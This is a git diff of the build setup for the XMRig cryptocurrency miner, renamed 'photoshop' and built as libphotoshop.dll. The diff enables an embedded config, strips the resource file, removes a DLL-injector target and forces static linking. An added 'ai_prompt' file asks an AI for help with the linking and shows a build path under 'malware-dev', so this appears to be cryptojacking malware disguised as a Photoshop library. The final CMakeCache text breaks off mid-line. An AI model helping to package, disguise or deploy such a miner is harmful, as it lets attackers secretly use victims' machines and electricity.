diff --git a/CMakeLists.txt b/CMakeLists.txt
index a759907f..5dc4c1f9 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -1,54 +1,51 @@ cmake_minimum_required(VERSION 3.10) project(photoshop) -option(WITH_HWLOC "Enable hwloc support" ON) -option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON) -option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON) -option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON) -option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON) -option(WITH_RANDOMX "Enable RandomX algorithms family" ON) -option(WITH_ARGON2 "Enable Argon2 algorithms family" ON) -option(WITH_KAWPOW "Enable KawPow algorithms family" ON) -option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON) -option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON) -option(WITH_DEBUG_LOG "Enable debug log output" OFF) -option(WITH_TLS "Enable OpenSSL support" ON) -option(WITH_ASM "Enable ASM PoW implementations" ON) -option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON) -option(WITH_ENV_VARS "Enable environment variables support in config file" OFF) -option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" ON) -option(WITH_OPENCL "Enable OpenCL backend" OFF) +option(WITH_HWLOC "Enable hwloc support" ON) +option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON) +option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON) +option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON) +option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON) +option(WITH_RANDOMX "Enable RandomX algorithms family" ON) +option(WITH_ARGON2 "Enable Argon2 algorithms family" ON) +option(WITH_KAWPOW "Enable KawPow algorithms family" ON) +option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON) +option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON) +option(WITH_DEBUG_LOG "Enable debug log output" OFF) +option(WITH_TLS "Enable OpenSSL support" ON) +option(WITH_ASM "Enable ASM PoW implementations" ON) +option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON) +option(WITH_ENV_VARS "Enable environment variables support in config file" 
OFF) +option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" ON) +option(WITH_OPENCL "Enable OpenCL backend" OFF) set(WITH_OPENCL_VERSION 200 CACHE STRING "Target OpenCL version") set_property(CACHE WITH_OPENCL_VERSION PROPERTY STRINGS 120 200 210 220) -option(WITH_CUDA "Enable CUDA backend" OFF) -option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" OFF) -option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" OFF) -option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON) +option(WITH_CUDA "Enable CUDA backend" OFF) +option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" OFF) +option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" OFF) +option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON) option(WITH_INTERLEAVE_DEBUG_LOG "Enable debug log for threads interleave" OFF) -option(WITH_PROFILING "Enable profiling for developers" OFF) -option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON) -option(WITH_AVX2 "Enable AVX2 for Blake2" ON) -option(WITH_VAES "Enable VAES instructions for Cryptonight" ON) -option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" OFF) -option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF) -option(WITH_DMI "Enable DMI/SMBIOS reader" ON) - -option(BUILD_STATIC "Build static binary" OFF) -option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) -option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) -option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF) +option(WITH_PROFILING "Enable profiling for developers" OFF) +option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON) +option(WITH_AVX2 "Enable AVX2 for Blake2" ON) +option(WITH_VAES "Enable VAES instructions for 
Cryptonight" ON) +option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" OFF) +option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF) +option(WITH_DMI "Enable DMI/SMBIOS reader" ON) +option(BUILD_STATIC "Build static binary" OFF) +option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) +option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) +option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF) set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_SOURCE_DIR}/cmake") - include (CheckIncludeFile) include (cmake/cpu.cmake) include (cmake/os.cmake) include (src/base/base.cmake) include (src/backend/backend.cmake) - set(HEADERS "${HEADERS_BASE}" "${HEADERS_BASE_HTTP}" @@ -58,7 +55,7 @@ set(HEADERS #src/core/config/Config_platform.h src/core/config/Config.h #src/core/config/ConfigTransform.h - #src/core/config/usage.h + # src/core/config/usage.h <-- REMOVED src/core/Controller.h src/core/Miner.h src/core/Taskbar.h @@ -148,7 +145,6 @@ if (WITH_HWLOC) list(APPEND HEADERS_CRYPTO src/crypto/common/NUMAMemoryPool.h ) - list(APPEND SOURCES_CRYPTO src/crypto/common/NUMAMemoryPool.cpp src/crypto/common/VirtualMemory_hwloc.cpp @@ -157,18 +153,16 @@ endif() if (XMRIG_OS_WIN) list(APPEND SOURCES_OS - res/app.rc + # res/app.rc <-- REMOVED src/App_win.cpp src/crypto/common/VirtualMemory_win.cpp ) - - set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp) + set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp crypt32) elseif (XMRIG_OS_APPLE) list(APPEND SOURCES_OS src/App_unix.cpp src/crypto/common/VirtualMemory_unix.cpp ) - find_library(IOKIT_LIBRARY IOKit) find_library(CORESERVICES_LIBRARY CoreServices) set(EXTRA_LIBS ${IOKIT_LIBRARY} ${CORESERVICES_LIBRARY}) 
@@ -177,7 +171,6 @@ else() src/App_unix.cpp src/crypto/common/VirtualMemory_unix.cpp ) - if (XMRIG_OS_ANDROID) set(EXTRA_LIBS pthread rt dl log) elseif (XMRIG_OS_LINUX) @@ -185,7 +178,6 @@ else() src/crypto/common/LinuxMemory.h src/crypto/common/LinuxMemory.cpp ) - set(EXTRA_LIBS pthread rt dl) elseif (XMRIG_OS_FREEBSD) set(EXTRA_LIBS kvm pthread) @@ -205,38 +197,18 @@ include(cmake/ghostrider.cmake) include(cmake/OpenSSL.cmake) include(cmake/asm.cmake) -# OpenCL dynamic compilation -#find_package(OpenCL) -#if (OPENCL_FOUND) -# add_definitions(/DXMRIG_FEATURE_OPENCL /DCL_USE_DEPRECATED_OPENCL_1_2_APIS) -# include(src/backend/opencl/opencl.cmake) -# target_link_libraries(${CMAKE_PROJECT_NAME} ${OPENCL_LIBRARIES}) -#endif() - -# CUDA dynamic compilation -#find_package(CUDA) -#if (CUDA_FOUND) -# add_definitions(/DXMRIG_FEATURE_CUDA) -# include(src/backend/cuda/cuda.cmake) -# target_link_libraries(${CMAKE_PROJECT_NAME} ${CUDA_LIBRARIES}) -#endif() - if (WITH_CN_LITE) add_definitions(/DXMRIG_ALGO_CN_LITE) endif() - if (WITH_CN_HEAVY) add_definitions(/DXMRIG_ALGO_CN_HEAVY) endif() - if (WITH_CN_PICO) add_definitions(/DXMRIG_ALGO_CN_PICO) endif() - if (WITH_CN_FEMTO) add_definitions(/DXMRIG_ALGO_CN_FEMTO) endif() - if (WITH_EMBEDDED_CONFIG) add_definitions(/DXMRIG_FEATURE_EMBEDDED_CONFIG) endif() 
@@ -253,28 +225,44 @@ if (WITH_DEBUG_LOG) endif() add_library(${CMAKE_PROJECT_NAME} SHARED ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES}) -add_executable(injector ./dll_injector.cpp) -#add_executable(${CMAKE_PROJECT_NAME} ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES}) -target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY} pthread) -target_link_libraries(injector psapi ntdll) -target_link_options(${CMAKE_PROJECT_NAME} PRIVATE -static-libgcc -static-libstdc++ -static) +# --- FIXED LINKING BLOCK --- if (WIN32) - target_link_options(${CMAKE_PROJECT_NAME} PRIVATE -mwindows) + target_link_libraries(${CMAKE_PROJECT_NAME} + # 1. Static Libraries + ${XMRIG_ASM_LIBRARY} + ${OPENSSL_LIBRARIES} + ${UV_LIBRARIES} + ${CPUID_LIB} + ${ARGON2_LIBRARY} + ${ETHASH_LIBRARY} + ${GHOSTRIDER_LIBRARY} + + # 2. Force Static Runtimes (Flags) + -static-libgcc + -static-libstdc++ + -Wl,-Bstatic + + # 3. Force Static Pthreads (Whole Archive) + -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive + + # 4. Force MSVCRT + -lmsvcrt + + # 5. 
System Libraries (Dynamic) + -Wl,-Bdynamic + ${EXTRA_LIBS} + ) +else() + target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY}) endif() +# --------------------------- if (WIN32) if (NOT ARM_TARGET) add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/bin/WinRing0/WinRing0x64.sys" $) endif() - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_1M.cmd" $) - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_10M.cmd" $) - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/pool_mine_example.cmd" $) - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/solo_mine_example.cmd" $) - #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/rtm_ghostrider_example.cmd" $) -endif() -set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -s") if (CMAKE_CXX_COMPILER_ID MATCHES Clang AND CMAKE_BUILD_TYPE STREQUAL Release AND NOT CMAKE_GENERATOR STREQUAL Xcode) add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_STRIP} "$") endif() diff --git a/ai_prompt b/ai_prompt new file mode 100644 index 00000000..c78b4908 --- /dev/null +++ b/ai_prompt 
@@ -0,0 +1,1003 @@ + /opt/llvm-mingw/bin/x86_64-w64-mingw32-objdump -p test_xmrig.exe | grep DLL && /opt/llvm-mingw/bin/x86_64-w64-mingw32-objdump -p libphotoshop.dll | grep DLL + DLL Name: KERNEL32.dll + DLL Name: api-ms-win-crt-environment-l1-1-0.dll + DLL Name: api-ms-win-crt-heap-l1-1-0.dll + DLL Name: api-ms-win-crt-locale-l1-1-0.dll + DLL Name: api-ms-win-crt-math-l1-1-0.dll + DLL Name: api-ms-win-crt-private-l1-1-0.dll + DLL Name: api-ms-win-crt-runtime-l1-1-0.dll + DLL Name: api-ms-win-crt-stdio-l1-1-0.dll + DLL Name: api-ms-win-crt-string-l1-1-0.dll + DLL Name: libstdc++-6.dll + DLL + DLL Name: WS2_32.dll + DLL Name: KERNEL32.dll + DLL Name: USER32.dll + DLL Name: ole32.dll + DLL Name: ADVAPI32.dll + DLL Name: api-ms-win-crt-stdio-l1-1-0.dll + DLL Name: api-ms-win-crt-runtime-l1-1-0.dll + DLL Name: api-ms-win-crt-string-l1-1-0.dll + DLL Name: api-ms-win-crt-time-l1-1-0.dll + DLL Name: api-ms-win-crt-math-l1-1-0.dll + DLL Name: api-ms-win-crt-heap-l1-1-0.dll + DLL Name: api-ms-win-crt-environment-l1-1-0.dll + DLL Name: api-ms-win-crt-private-l1-1-0.dll + DLL Name: api-ms-win-crt-utility-l1-1-0.dll + DLL Name: api-ms-win-crt-convert-l1-1-0.dll + DLL Name: api-ms-win-crt-filesystem-l1-1-0.dll + DLL Name: IPHLPAPI.DLL + DLL Name: USERENV.dll + DLL Name: api-ms-win-crt-locale-l1-1-0.dll + DLL Name: api-ms-win-crt-multibyte-l1-1-0.dll + DLL Name: CRYPT32.dll + DLL Name: dbghelp.dll + DLL Name: SHELL32.dll + DLL name: libphotoshop.dll + +These are the external dlls my exe and dll rely on. I dont want to have them seperate and i just want to have them inside my dll +/usr/lib/libstdc++.a +/usr/lib/gcc/x86_64-w64-mingw32/15.2.0/libgcc.a +/opt/llvm-mingw/x86_64-w64-mingw32/lib/libwinpthread.a + +Command im using to build + +cmake -G Ninja .. 
\ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_SYSTEM_NAME=Windows \ + -DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \ + -DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \ + -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \ + -DWITH_TLS=ON \ + -DWITH_EMBEDDED_CONFIG=ON + ninja -j10 + +x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.dll + +this is my CMakeLists.txt file +cmake_minimum_required(VERSION 3.10) +project(xmrig) + +option(WITH_HWLOC "Enable hwloc support" ON) +option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON) +option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON) +option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON) +option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON) +option(WITH_RANDOMX "Enable RandomX algorithms family" ON) +option(WITH_ARGON2 "Enable Argon2 algorithms family" ON) +option(WITH_KAWPOW "Enable KawPow algorithms family" ON) +option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON) +option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON) +option(WITH_DEBUG_LOG "Enable debug log output" OFF) +option(WITH_TLS "Enable OpenSSL support" ON) +option(WITH_ASM "Enable ASM PoW implementations" ON) +option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON) +option(WITH_ENV_VARS "Enable environment variables support in config file" ON) +option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" OFF) +option(WITH_OPENCL "Enable OpenCL backend" ON) +set(WITH_OPENCL_VERSION 200 CACHE STRING "Target OpenCL version") +set_property(CACHE WITH_OPENCL_VERSION PROPERTY STRINGS 120 200 210 220) +option(WITH_CUDA "Enable CUDA backend" ON) +option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" ON) +option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" ON) +option(WITH_STRICT_CACHE "Enable 
strict checks for OpenCL cache" ON) +option(WITH_INTERLEAVE_DEBUG_LOG "Enable debug log for threads interleave" OFF) +option(WITH_PROFILING "Enable profiling for developers" OFF) +option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON) +option(WITH_AVX2 "Enable AVX2 for Blake2" ON) +option(WITH_VAES "Enable VAES instructions for Cryptonight" ON) +option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" ON) +option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF) +option(WITH_DMI "Enable DMI/SMBIOS reader" ON) + +option(BUILD_STATIC "Build static binary" ON) +option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) +option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF) +option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF) + + +set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_SOURCE_DIR}/cmake") + + +include (CheckIncludeFile) +include (cmake/cpu.cmake) +include (cmake/os.cmake) +include (src/base/base.cmake) +include (src/backend/backend.cmake) + + +set(HEADERS + "${HEADERS_BASE}" + "${HEADERS_BASE_HTTP}" + "${HEADERS_BACKEND}" + src/App.h + src/core/config/Config_default.h + src/core/config/Config_platform.h + src/core/config/Config.h + src/core/config/ConfigTransform.h + src/core/config/usage.h + src/core/Controller.h + src/core/Miner.h + src/core/Taskbar.h + src/net/interfaces/IJobResultListener.h + src/net/JobResult.h + src/net/JobResults.h + src/net/Network.h + src/net/strategies/DonateStrategy.h + src/Summary.h + src/version.h + ) + +set(HEADERS_CRYPTO + src/backend/common/interfaces/IMemoryPool.h + src/crypto/cn/asm/CryptonightR_template.h + src/crypto/cn/c_blake256.h + src/crypto/cn/c_groestl.h + src/crypto/cn/c_jh.h + src/crypto/cn/c_skein.h + src/crypto/cn/CnAlgo.h + src/crypto/cn/CnCtx.h + src/crypto/cn/CnHash.h + src/crypto/cn/CryptoNight_monero.h + src/crypto/cn/CryptoNight_test.h 
+ src/crypto/cn/CryptoNight.h + src/crypto/cn/groestl_tables.h + src/crypto/cn/hash.h + src/crypto/cn/skein_port.h + src/crypto/cn/soft_aes.h + src/crypto/common/HugePagesInfo.h + src/crypto/common/MemoryPool.h + src/crypto/common/Nonce.h + src/crypto/common/portable/mm_malloc.h + src/crypto/common/VirtualMemory.h + ) + +if (XMRIG_ARM) + set(HEADERS_CRYPTO "${HEADERS_CRYPTO}" src/crypto/cn/CryptoNight_arm.h) +else() + set(HEADERS_CRYPTO "${HEADERS_CRYPTO}" src/crypto/cn/CryptoNight_x86.h) +endif() + +set(SOURCES + "${SOURCES_BASE}" + "${SOURCES_BASE_HTTP}" + "${SOURCES_BACKEND}" + src/App.cpp + src/core/config/Config.cpp + src/core/config/ConfigTransform.cpp + src/core/Controller.cpp + src/core/Miner.cpp + src/core/Taskbar.cpp + src/net/JobResults.cpp + src/net/Network.cpp + src/net/strategies/DonateStrategy.cpp + src/Summary.cpp + src/xmrig.cpp + ) + +set(SOURCES_CRYPTO + src/crypto/cn/c_blake256.c + src/crypto/cn/c_groestl.c + src/crypto/cn/c_jh.c + src/crypto/cn/c_skein.c + src/crypto/cn/CnCtx.cpp + src/crypto/cn/CnHash.cpp + src/crypto/common/HugePagesInfo.cpp + src/crypto/common/MemoryPool.cpp + src/crypto/common/Nonce.cpp + src/crypto/common/VirtualMemory.cpp + ) + +if (CMAKE_C_COMPILER_ID MATCHES GNU) + set_source_files_properties(src/crypto/cn/CnHash.cpp PROPERTIES COMPILE_FLAGS "-Ofast -fno-tree-vectorize") +endif() + +if (WITH_VAES) + add_definitions(-DXMRIG_VAES) + set(HEADERS_CRYPTO "${HEADERS_CRYPTO}" src/crypto/cn/CryptoNight_x86_vaes.h) + set(SOURCES_CRYPTO "${SOURCES_CRYPTO}" src/crypto/cn/CryptoNight_x86_vaes.cpp) + if (CMAKE_C_COMPILER_ID MATCHES GNU OR CMAKE_C_COMPILER_ID MATCHES Clang) + set_source_files_properties(src/crypto/cn/CryptoNight_x86_vaes.cpp PROPERTIES COMPILE_FLAGS "-Ofast -fno-tree-vectorize -mavx2 -mvaes") + endif() +endif() + +if (WITH_HWLOC) + list(APPEND HEADERS_CRYPTO + src/crypto/common/NUMAMemoryPool.h + ) + + list(APPEND SOURCES_CRYPTO + src/crypto/common/NUMAMemoryPool.cpp + src/crypto/common/VirtualMemory_hwloc.cpp + ) 
+endif() + +if (XMRIG_OS_WIN) + list(APPEND SOURCES_OS + res/app.rc + src/App_win.cpp + src/crypto/common/VirtualMemory_win.cpp + ) + + set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp) +elseif (XMRIG_OS_APPLE) + list(APPEND SOURCES_OS + src/App_unix.cpp + src/crypto/common/VirtualMemory_unix.cpp + ) + + find_library(IOKIT_LIBRARY IOKit) + find_library(CORESERVICES_LIBRARY CoreServices) + set(EXTRA_LIBS ${IOKIT_LIBRARY} ${CORESERVICES_LIBRARY}) +else() + list(APPEND SOURCES_OS + src/App_unix.cpp + src/crypto/common/VirtualMemory_unix.cpp + ) + + if (XMRIG_OS_ANDROID) + set(EXTRA_LIBS pthread rt dl log) + elseif (XMRIG_OS_LINUX) + list(APPEND SOURCES_OS + src/crypto/common/LinuxMemory.h + src/crypto/common/LinuxMemory.cpp + ) + + set(EXTRA_LIBS pthread rt dl) + elseif (XMRIG_OS_FREEBSD) + set(EXTRA_LIBS kvm pthread) + endif() +endif() + +add_definitions(-DXMRIG_MINER_PROJECT -DXMRIG_JSON_SINGLE_LINE_ARRAY) +add_definitions(-D__STDC_FORMAT_MACROS -DUNICODE -D_FILE_OFFSET_BITS=64) + +find_package(UV REQUIRED) + +include(cmake/flags.cmake) +include(cmake/randomx.cmake) +include(cmake/argon2.cmake) +include(cmake/kawpow.cmake) +include(cmake/ghostrider.cmake) +include(cmake/OpenSSL.cmake) +include(cmake/asm.cmake) + +if (WITH_CN_LITE) + add_definitions(/DXMRIG_ALGO_CN_LITE) +endif() + +if (WITH_CN_HEAVY) + add_definitions(/DXMRIG_ALGO_CN_HEAVY) +endif() + +if (WITH_CN_PICO) + add_definitions(/DXMRIG_ALGO_CN_PICO) +endif() + +if (WITH_CN_FEMTO) + add_definitions(/DXMRIG_ALGO_CN_FEMTO) +endif() + +if (WITH_EMBEDDED_CONFIG) + add_definitions(/DXMRIG_FEATURE_EMBEDDED_CONFIG) +endif() + +include(src/hw/api/api.cmake) +include(src/hw/dmi/dmi.cmake) + +include_directories(src) +include_directories(src/3rdparty) +include_directories(${UV_INCLUDE_DIR}) + +if (WITH_DEBUG_LOG) + add_definitions(/DAPP_DEBUG) +endif() + +add_library(${CMAKE_PROJECT_NAME} SHARED ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} 
${XMRIG_ASM_SOURCES}) +#add_executable(${CMAKE_PROJECT_NAME} ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES}) +target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY}) + +if (WIN32) + if (NOT ARM_TARGET) + add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/bin/WinRing0/WinRing0x64.sys" $) + endif() + + add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_1M.cmd" $) + #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_10M.cmd" $) + #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/pool_mine_example.cmd" $) + #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/solo_mine_example.cmd" $) + #add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/rtm_ghostrider_example.cmd" $) +endif() + +if (CMAKE_CXX_COMPILER_ID MATCHES Clang AND CMAKE_BUILD_TYPE STREQUAL Release AND NOT CMAKE_GENERATOR STREQUAL Xcode) + add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_STRIP} "$") +endif() + + + +This is from CMakeCache.txt + +# This is the CMakeCache file. +# For build in directory: /home/someone/malware-dev/xmrig-minimized-dll/build +# It was generated by CMake: /usr/bin/cmake +# You can edit this file to change values found and used by cmake. +# If you do not want to change any of the values, simply exit the editor. 
+# If you do want to change a value, simply edit, save, and exit the editor. +# The syntax for the file is as follows: +# KEY:TYPE=VALUE +# KEY is the name of a variable in the cache. +# TYPE is a hint to GUIs for the type of VALUE, DO NOT EDIT TYPE!. +# VALUE is the current value for the KEY. + +######################## +# EXTERNAL cache entries +######################## + +//Force ARMv7 (32 bit) architecture, use with caution if automatic +// detection fails, but you sure it may work +ARM_V7:BOOL=OFF + +//Force ARMv8 (64 bit) architecture, use with caution if automatic +// detection fails, but you sure it may work +ARM_V8:BOOL=OFF + +//Build static binary +BUILD_STATIC:BOOL=OFF + +//Path to a program. +CMAKE_ADDR2LINE:FILEPATH=/opt/llvm-mingw/bin/llvm-addr2line + +//Path to a program. +CMAKE_AR:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ar + +//ASM compiler +CMAKE_ASM_COMPILER:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang + +//LLVM archiver +CMAKE_ASM_COMPILER_AR:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ar + +//`clang-scan-deps` dependency scanner +CMAKE_ASM_COMPILER_CLANG_SCAN_DEPS:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang-scan-deps + +//Generate index for LLVM archive +CMAKE_ASM_COMPILER_RANLIB:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ranlib + +//Flags used by the ASM compiler during all build types. +CMAKE_ASM_FLAGS:STRING= + +//Flags used by the ASM compiler during DEBUG builds. +CMAKE_ASM_FLAGS_DEBUG:STRING=-g + +//Flags used by the ASM compiler during MINSIZEREL builds. +CMAKE_ASM_FLAGS_MINSIZEREL:STRING=-Os -DNDEBUG + +//Flags used by the ASM compiler during RELEASE builds. +CMAKE_ASM_FLAGS_RELEASE:STRING=-O3 -DNDEBUG + +//Flags used by the ASM compiler during RELWITHDEBINFO builds. +CMAKE_ASM_FLAGS_RELWITHDEBINFO:STRING=-O2 -g -DNDEBUG + +//Choose the type of build, options are: None Debug Release RelWithDebInfo +// MinSizeRel ... 
+CMAKE_BUILD_TYPE:STRING=Release + +//No help, variable specified on the command line. +CMAKE_CXX_COMPILER:UNINITIALIZED=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ + +//LLVM archiver +CMAKE_CXX_COMPILER_AR:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ar + +//`clang-scan-deps` dependency scanner +CMAKE_CXX_COMPILER_CLANG_SCAN_DEPS:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang-scan-deps + +//Generate index for LLVM archive +CMAKE_CXX_COMPILER_RANLIB:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ranlib + +//Flags used by the CXX compiler during all build types. +CMAKE_CXX_FLAGS:STRING= + +//Flags used by the CXX compiler during DEBUG builds. +CMAKE_CXX_FLAGS_DEBUG:STRING=-g + +//Flags used by the CXX compiler during MINSIZEREL builds. +CMAKE_CXX_FLAGS_MINSIZEREL:STRING=-Os -DNDEBUG + +//Flags used by the CXX compiler during RELEASE builds. +CMAKE_CXX_FLAGS_RELEASE:STRING=-O3 -DNDEBUG + +//Flags used by the CXX compiler during RELWITHDEBINFO builds. +CMAKE_CXX_FLAGS_RELWITHDEBINFO:STRING=-O2 -g -DNDEBUG + +//Libraries linked by default with all C++ applications. +CMAKE_CXX_STANDARD_LIBRARIES:STRING=-lkernel32 -luser32 -lgdi32 -lwinspool -lshell32 -lole32 -loleaut32 -luuid -lcomdlg32 -ladvapi32 + +//No help, variable specified on the command line. +CMAKE_C_COMPILER:UNINITIALIZED=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang + +//LLVM archiver +CMAKE_C_COMPILER_AR:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ar + +//`clang-scan-deps` dependency scanner +CMAKE_C_COMPILER_CLANG_SCAN_DEPS:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang-scan-deps + +//Generate index for LLVM 